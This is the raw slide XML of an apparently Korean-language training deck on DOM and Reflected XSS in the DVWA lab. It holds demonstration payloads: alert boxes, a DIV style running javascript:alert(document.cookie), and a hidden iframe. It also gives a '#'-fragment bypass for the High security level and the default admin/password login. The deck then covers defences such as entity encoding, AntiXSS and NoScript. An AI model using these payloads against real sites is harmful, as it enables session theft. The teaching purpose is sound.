            <a:ext cx="5962797" cy="18347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0834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로그인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9C64A31-65E3-45B8-83D6-5D129F4084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6" r="6586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Username : admin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 : password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DFC081F-1A00-4D11-822D-4CF3D17EEDD4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702884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English -&gt; select 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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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alert(＇warning＇)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경고창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발생</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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이와 같이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조작 하여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6056D3B9-EF1C-47CA-875C-07E1CB841BB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B6A118C-5851-4DE3-9F43-A9C2684197F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839304" y="1956668"/>
            <a:ext cx="2279408" cy="1858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53C146-3ABF-426D-8014-A24C5F9867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095"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="582433" y="3124332"/>
            <a:ext cx="5693132" cy="330477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8CABB9-32A5-4C3D-9402-03CEFD15E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1783048"/>
            <a:ext cx="5874991" cy="13260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28FE152-F997-4427-8F1C-92758E5E5F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554121" y="2633115"/>
            <a:ext cx="773132" cy="2541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AC99387-16FC-48E0-8A77-1E762433F662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1783048"/>
            <a:ext cx="5913238" cy="47726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BC636E4-F72C-4E21-B00B-312759913991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2525595" y="4710001"/>
            <a:ext cx="1751840" cy="10650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016822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Level : High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9"/>
            <a:ext cx="5902671" cy="4922744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&lt;?php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if (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array_key_exists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“default”, $_GET ) &amp;&amp; !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is_null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($_GET[  ‘default’ ]) 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switch ($_GET[‘default’])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case “French”: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case “English”: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case “German”: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case “Spanish”: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	break;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default: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	header (“location: ?default=English”);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	exit;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	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?&gt;</a:t>
            </a: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9DF9CF09-1547-4AB2-BA0B-26BFFEA019A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="6962066"/>
            <a:ext cx="5913238" cy="22708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00" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="1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High security level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에서는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medium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security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level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에서와는 다르게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GET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메소드로 넘어오는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default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값이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French, English, German, Spanish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가 아니면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default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값이 강제적으로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English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로 설정이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그래서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medium security level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에서 썼던 스크립트 구문을 입력을 해도 구문이 실행이 되지 않고 단순히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default=English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로 지정이 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</a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="1" hangingPunct="1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그러나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URL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에서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default=English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뒤에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#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을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붙이면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#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뒤에 오는 값들은 서버로는 전송이 되지 않지만  브라우저에서는 동일하게 실행이 돼서 공격자가 원하는 공격을 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2114200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9BF0748-D38F-4A5E-83F9-3C50ADC96BF0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예방 기술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D72041D-8C91-4D67-9BE5-1A74F018C2FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426690" y="1805928"/>
            <a:ext cx="6004619" cy="801369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/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>주목해야 할 점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현재 웹 방화벽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(WAF)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도입하여 방어하고 있으나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     대부분의 웹 방화벽은 특정 문자열만을 탐지하여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방어하고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이는 쉽게 우회할 수 있어 방어가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    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효과적이지는 못하다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웹 애플리케이션 개발자는 태그 등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브라우저에서 실행되는 위험한 문자를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중성화하여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XSS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취약점을 예방하고 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하지만 웹 개발자들이 일일이 수동적으로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위험한 문자를 필터링 및 인코딩 하는 것은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현실적으로 불가능하며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취약점이 잔존하게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된다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이러한 방식으로 인해 중소 및 대형 웹 사이트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등에서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XSS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취약점이 지속적으로 발견되고있다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220693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7249EC5C-7A36-40C1-9518-88BB533D5AA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예방 기술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8AAAD7-9B2C-4ABB-BDAE-60B0B042CB57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426692" y="1805927"/>
            <a:ext cx="6004618" cy="7934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입・출력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값 검증 및 무효화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XSS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취약점을 근본적으로 제거하기 위해서는 스크립트 등 해킹에 사용될 수 있는 코딩에 사용되는 입력 및 출력 값에 대해서 검증하고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무효화시켜야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.</a:t>
            </a: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입력 값에 대한 유효성 검사는 데이터가 입력되기 전에 가능하면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입력 데이터에 대한 길이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문자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형식 및 사업적 규칙 유효성을 검사해야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3673121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6BAAC5-EC35-4A58-A0F4-5E0A2FDC557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예방 기술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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="7934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입・출력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값 검증 및 무효화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출력 값을 무효화하기 위해서는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XSS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공격은 기본적으로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&lt;script&gt;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태그를 사용하기 때문에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XSS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공격을 차단하기 위해 태그 문자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(&lt;,&gt;)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등 위험한 문자 입력 시 문자 참조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(HTML entity)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로 필터링하고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서버에서 브라우저로 전송 시 문자를 인코딩하는 것이다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HTML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문자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참조란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ASCII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문자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10)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를 동일한 의미의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HTML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문자로 변경하는 과정이다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예를 들어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문자 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&lt;“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동일한 의미의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HTML “&amp;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lt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;”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로 변경한다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571283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6BAAC5-EC35-4A58-A0F4-5E0A2FDC557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예방 기술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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="7934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입・출력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값 검증 및 무효화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HTML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엔터티는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대부분의 인터프리터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특히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브라우저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에서 특수한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FOCUS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의미를 가지지 않으며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단순한 문자로 처리된다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이렇게 인코딩하면 사용자는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&lt;script&gt;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&lt;script&gt;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로보이지만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HTML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문서에서는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&amp;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lt;script&amp;gt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;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로 나타나서 브라우저에서 일반 문자로 인식하고 스크립트로 해석되어 실행되지는 않는다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</p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0254EFCE-8109-43BD-99CD-3070D3B79792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483839" y="5486629"/>
          <a:ext cx="5901780" cy="214448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75445">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="326466558"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1475445">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2105194107"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1475445">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4091302712"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1475445">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2299241615"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="428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ASCII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문자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 문자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ASCII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문자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참조 문자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488920"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="428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&amp;amp;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quot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374044"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="428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lt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‘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&amp;#x27;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18340"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="428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&gt;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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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gt</a:t>
                      </a:r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/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&amp;#x2F;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718211"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="428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&amp;#40;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&amp;#41;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09441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71A1FC6-4434-41B9-8177-E16C832B0E09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483840" y="7895155"/>
            <a:ext cx="5901779" cy="14801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&lt;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위험 문자 대체 문자 인코딩 표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&gt;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악성 스크립트는 많은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HTML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태그 안에 포함할 수 있으므로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표 안의 문자의 경우 반드시 출력 값을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이스케이핑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해야 한다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646382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6BAAC5-EC35-4A58-A0F4-5E0A2FDC557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예방 기술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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="7934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입・출력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값 검증 및 무효화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CSS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DIV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엘리먼트에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다음과 같이 악성 자바스크립트를 숨길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Ex)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="2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&lt;DIV STYLE="background-image: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url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javascript:alert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document.cookie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))“&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="2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그래서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HTML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속성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(attributes)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 들어가는 값도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&amp;#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xHH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(HH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16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진수 값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으로 반드시 인코딩 해야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아이프레임의 경우 다음과 같이 악성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URL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을 포함시켜 악성 자바스크립트가 포함된 페이지를 사용자가 읽으면서 브라우저를 공격할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Ex)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="2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&lt;iframe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src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="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악성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URL" width="0" height="0" frameborder="0”&gt;&lt;/iframe&gt;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219622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6BAAC5-EC35-4A58-A0F4-5E0A2FDC557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예방 기술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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="7934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입・출력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값 검증 및 무효화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악성 스크립트 등 악성 데이터를 포함되어 브라우저를 공격할 수 있는 다양한 방법의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HTML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태그를 정리해 놓은 것이다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여기에 있는 ‘악성 데이터’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악성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URL’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및 ‘악성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HTML’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악성 자바 스크립트 등이 포함이 될 수 있는 곳이다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914400" marR="0" lvl="2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웹 애플리케이션 개발자들은 웹 문서를 코딩 시 다음 표에 있는 태그에 포함될 악성 데이터에 대해서 반드시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입・출력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값을 검증해야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590791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6BAAC5-EC35-4A58-A0F4-5E0A2FDC557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예방 기술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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="7934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입・출력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값 검증 및 무효화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악성 스크립트 등 악성 데이터를 포함되어 브라우저를 공격할 수 있는 다양한 방법의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HTML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태그를 정리해 놓은 것이다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여기에 있는 ‘악성 데이터’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‘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악성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URL’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및 ‘악성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HTML’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악성 자바 스크립트 등이 포함이 될 수 있는 곳이다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914400" marR="0" lvl="2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즉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웹 애플리케이션 개발자들은 웹 문서를 코딩 시 다음 표에 있는 태그에 포함될 악성 데이터에 대해서 반드시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입・출력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값을 검증해야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983FC9-9CBE-4865-AB6A-14AE6ACE3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156" y="2462997"/>
            <a:ext cx="6169687" cy="66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65823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6BAAC5-EC35-4A58-A0F4-5E0A2FDC557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예방 기술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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="7934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입・출력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 값 검증 및 무효화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하지만 애플리케이션 개발자가 많은 태그의 입력 문자를 검증하기 위해 코딩 시 일일이 작업하는 것은 많은 노력과 자원이 소모된다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또한 인코딩 방식을 통해 방어기술을 무력화할 수 있으므로 애플리케이션 개발자 직접 모두 처리하는 것은 근본적으로 불가능하다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그래서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입・출력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값을 자동적으로 검증해주는 라이브러리를 사용하면 좀 더 효과적으로 대응할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55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완료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7B0A224-CDF4-4C85-B76B-5185BB84692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" t="-35208" r="-3703"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="565150" y="723902"/>
            <a:ext cx="5911850" cy="4686300"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1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035040"/>
            <a:ext cx="5913238" cy="319785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정상적으로 로그인이 되었다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D8850F73-A4BF-40BA-9620-7298696C9F5D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XAMPP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55183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6BAAC5-EC35-4A58-A0F4-5E0A2FDC557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예방 기술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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="7934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보안 라이브러리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AntiXSS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AntiXSS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라이브러리는 마이크로소프트사에서 개발한 공개용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XSS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취약점 예방 라이브러리이다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AntiXSS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라이브러리는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ASP.net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애플리케이션 개발환경에서 사용되며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현재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ASP.net 4.5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이후 버전에만 사용이 가능하다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 라이브러리는 입력 값을 검증하여 서버로 악성 스크립트로 입력되지 못하는 기능과 위험한 문자를 인코딩하는 함수를 제공한다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[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그림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15]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은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AntiXSS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에서 제공하는 위험한 데이터를 출력 시 인코딩해주는 메소드이다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428936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6BAAC5-EC35-4A58-A0F4-5E0A2FDC557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예방 기술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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="7934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보안 라이브러리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AntiXSS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800100" marR="0" lvl="1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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CEE36E-600E-47D3-8D16-474E8A378D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="357496" y="3198339"/>
          <a:ext cx="6143008" cy="62672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9117">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1294407003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1955748">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="617643450"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2748143">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3397555561"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4140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메소드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사용처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aseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill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코딩 예</a:t>
                      </a:r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2393091"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8193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HtmlEncode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신뢰할 수 없는 데이터가 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 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바디 부분 에 출력되는 경우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&lt;span&gt;[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악성 데이터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] &lt;/span&gt;</a:t>
                      </a:r>
                    </a:p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&lt;p&gt;Hello [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악성 데이터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]&lt;/p&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/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37576"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8193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HtmlAttrEncode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 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속성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(attributes)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 신뢰할 수 없는 데이터를 추가해야 하는 경우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&lt;input type=“text” name=“frame” value=“[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악성데이터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]”&gt;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&lt;p id=“[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악성 데이터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]”&gt;&lt;/p&gt;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245644"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8193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UrlQueryEncode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URL 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내에 쿼리 문자열 값에 신뢰할 수 없는 데이터를 추가해야 하는 경우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&lt;a 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href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=“/site/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search?value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=[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악성데이터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]”&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/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clickme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&lt;/a&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/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JavaScriptEncode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754893"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8193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JavaScriptEncode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신뢰할 수 없는 데이터를 자바스크립트 변수에 지정할 경우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&lt;script&gt;var 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currentValue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=‘[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악성 데이터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]’;&lt;/script&gt;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&lt;script&gt;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someFuction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(‘[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악성 데이터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]‘);&lt;/script&gt;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112928"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8193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XmlEncode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XML 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부분에 신뢰할 수 없는 데이터를 출력하는 경우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&lt;name&gt;[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악성 데이터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]&lt;/name&gt;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123211"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8193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XmlAttrEncode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XML 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속성 값에 신뢰할 수 없는 데이터를 추가해야 하는 경우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&lt;name </a:t>
                      </a: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firstName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=“[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악성 데이터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]”&gt;&lt;/name&gt;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098421"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8193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GetSafeHtml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 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바디에 신뢰할 수 없는 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출력하는 경우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&lt;div&gt;[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악성 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HTML]&lt;/div&gt;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19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550738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046BAAC5-EC35-4A58-A0F4-5E0A2FDC5576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예방 기술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3-10) XSS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(DOM)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3025D0-34F4-4E91-BEF9-0BC5C45073AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1805927"/>
            <a:ext cx="6004619" cy="793497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/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>브라우저 확장 프로그램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/>
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101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애플리케이션 개발 시 이용하는 라이브러리 이외에도 사용자가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XSS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공격을 예방할 수 있는 프로그램도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NoScript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는 파이어폭스 등 모질라 기반의 브라우저에서 실행되는 오픈 소스 확장 프로그램으로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화이트 리스트 기반으로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신뢰된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사이트의 자바스크립트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플래쉬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실버라이트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및 액티브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X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등 동적 스크립트만 브라우저에서 실행하도록 하여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XSS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공격을 예방할 수 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3590689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BD7F47-16F7-4569-8C42-5711FB9D9072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="-685801" y="2584447"/>
            <a:ext cx="8229602" cy="2355849"/>
            <a:chOff x="541658" y="2057401"/>
            <a:chExt cx="8061962" cy="2355849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59AB7B9-E1ED-4F4B-95C9-1998008A349C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A1466FD8-DB7A-4F65-99CD-09D1490A87C0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제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDDD98AD-CF73-44C3-8A21-F94D383CDF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827803" y="3033775"/>
            <a:ext cx="5472234" cy="135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  XSS(Reflected)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1B5F9-C014-48C5-8332-33A05F414C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-64497" y="3346871"/>
            <a:ext cx="2268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3-11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14973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XSS Reflected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개요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(Cross-Site Scripting)</a:t>
            </a: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읽는 것이 맞지만 이미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Cascading Style Sheets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약자로 사용되고 있어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게시판이나 웹 메일 등에 스크립트 코드를 삽입해 개발자가 고려하지 않은 기능이 작동하게 하는 공격이다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공격은 크게 세 가지로 분류하는데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이번에 소개할 공격은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Reflected XSS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사용자에게 악의적인 코드를 심어 클릭을 유도한 뒤 세션 정보를 빼내는 공격이다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공격이 다시 반환되어 돌아온다는 것이 특징이며 돌아오는 것은 세션 정보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정보 같은 것이다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="426691" y="1918961"/>
            <a:ext cx="59118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71209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실습 환경 설정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공격을 진행하기전에 실습할 환경을 설정한다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통해 진행하며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~ Impossible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난이도까지 차례대로 살펴본다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가상머신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VMWare 15.5.6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운영체제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Kali Linux 2.6.32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호스트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PC : Windows 10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방화벽 및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SELINUX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설정은 전부 해제하고 진행했다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Are VMware Workstation &amp; Fusion Dead? | Aidan Finn, IT Pro">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B63733B-E037-448E-87B8-51FCEBE3C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49" y="3460748"/>
            <a:ext cx="27051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crosoft Windows 10 IoT Enterprise LTSB (Intel Core i7/Xeon) - Sealevel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96531C0B-B463-4A16-A24E-9F327555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185" y="195921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WS Marketplace: Kali Linux">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25B4A44-1DC9-447F-A131-8806430F3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0" y="1959211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091001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LOW Reflected XSS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691" y="7878229"/>
            <a:ext cx="6120154" cy="13415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왼쪽탭에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Security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클릭해준다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레벨로 설정 해준 뒤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클릭해준다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D7238B2-9FA6-463B-8FB4-ABCFA7F0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82" y="1775147"/>
            <a:ext cx="6200696" cy="57292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23CE00-8A8B-4AD9-BF68-F25C7EBCD303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439570" y="6400800"/>
            <a:ext cx="1260441" cy="257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46FD1B-D9F7-42B7-93F5-283AA0CBB7CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918952" y="5370490"/>
            <a:ext cx="772732" cy="11848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89A6F1-ED92-4A16-8E05-EF0C1EB1EE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719962" y="5383370"/>
            <a:ext cx="671822" cy="27045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11949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LOW Reflected XSS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6691" y="7878229"/>
            <a:ext cx="6120154" cy="13415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왼쪽탭에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XSS(Reflected)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메뉴를  클릭해준다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을 입력하면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Hello OOO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출력해준다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14E2B9B-E1D2-49FB-8BCB-BA0AFDA1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91" y="1862472"/>
            <a:ext cx="6120154" cy="54140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23CE00-8A8B-4AD9-BF68-F25C7EBCD303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="5357611"/>
            <a:ext cx="1260441" cy="25757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F8476D-B3BE-4BF2-9DFD-C91B6509D687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963291" y="2939416"/>
            <a:ext cx="4468018" cy="6280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599185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Low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레벨 소스코드 분석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7464" y="5762914"/>
            <a:ext cx="6246532" cy="383066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GET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방식으로 전달되는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변수의 값이 존재하는지 확인 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 NULL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아니면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변수의 값 출력한다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Echo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명령어를 사용하여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Hello +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변수의 값을 출력한다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문자열이 공격자가 입력 한 것과 똑같은 방식으로 다시 반환되는 것을 확인할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입력한 값이 비정상일 경우에도 값을 출력한다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89E75C-D53E-47F8-889E-9FC3C16B5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94" y="1956640"/>
            <a:ext cx="6062006" cy="355395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A8F4C5B-49F1-4A34-929F-CCC45E340BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720680" y="4335517"/>
            <a:ext cx="3964544" cy="2995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18F343B-B3FE-4339-8606-4EFE4722E90C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471487" y="3846838"/>
            <a:ext cx="5519409" cy="2995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94171F8D-0EE6-446C-AB9D-37A6AECF1648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754880" y="3376799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30FD79-4C53-4557-9945-D97A2C08CFA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965895" y="3263705"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B69"/>
              </a:solidFill>
            </a:endParaRP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9A5206F-FCA2-47DB-B330-3E01CDD15313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4003040" y="4755452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CB3D5-74E0-4E9D-899B-B518F294B1A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
